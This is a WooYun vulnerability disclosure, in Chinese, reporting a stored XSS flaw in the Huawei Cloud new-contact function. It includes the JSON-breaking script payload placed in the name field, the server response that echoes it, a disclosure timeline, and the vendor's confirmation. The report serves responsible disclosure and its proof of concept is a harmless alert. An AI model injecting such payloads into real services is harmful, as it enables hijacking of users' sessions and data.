当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148057

漏洞标题:华为云服务新建联系人存在xss漏洞

相关厂商:华为技术有限公司

漏洞作者: 我山之石-无

提交时间:2015-10-20 16:31

修复时间:2015-12-06 20:24

公开时间:2015-12-06 20:24

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-22: 厂商已经确认,细节仅向厂商公开
2015-11-01: 细节向核心白帽子及相关领域专家公开
2015-11-11: 细节向普通白帽子公开
2015-11-21: 细节向实习白帽子公开
2015-12-06: 细节向公众公开

简要描述:

使用华为云服务的新建联系人功能,发现存在xss漏洞,没有对返回的json体做xss过虑

详细说明:

1、华为云服务的新建联系人功能

3.JPG


2、在姓名的地方注入代码"}]}<html><body><script>alert(1);</script></body></html>

4.JPG


3、点击“完成”后是可以添加成功的
服务器的响应:
HTTP/1.1 200 OK
Date: Tue, 20 Oct 2015 06:57:51 GMT
Server: openresty
Content-Type: application/json;charset=utf-8
Content-Length: 913
X-Frame-Options: SAMEORIGIN
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
{"contactList":[{"addressList":[],"bDay":"","bDayLunar":"","contactId":"GCID568184971470690162","emailList":[{"name":"","type":12,"value":"amos2016@163.com"}],"eventList":[],"fName":"\"}]}<html><body><script>alert(1);<\/script><\/body><\/html>","groupIdList":[],"msgList":[],"name":{"firstName":"","firstNameSpell":"","lastName":"\"}]}<html><body><script>alert(1);<\/script><\/body><\/html>","lastNameSpell":"\"}]}<html><body><script>alert(1);<\/script><\/body><\/html>","middleName":"","middleNameSpell":"","namePrefix":"","nameSuffix":""},"nickName":"","note":"","organizeList":[{"name":"","org":"工作单位","title":"","type":-1,"value":""}],"photoUrl":"","relationList":[],"telList":[{"name":"","type":1,"value":"15751837766"}],"ticName":{"firstName":"","lastName":"","middleName":""},"uId":"CCID0011445324097865a2298fdd8e444796","urlList":[]}],"Result":{"resultCode":"0","resultDesc":"Operation succeeds"}}

漏洞证明:

1、看看注入效果(不想注入危害代码做事)

2.JPG


2、只要显示该联系人的地方就会触发xss代码

修复方案:

过虑xss,json体可以关闭标签后写入html,这样就可以触发xss代码了

版权声明:转载请注明来源 我山之石-无@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2015-10-22 20:23

厂商回复:

感谢白帽子对华为公司安全的关注,我们已经将该漏洞通知了业务部门,会尽快修复。

最新状态:

暂无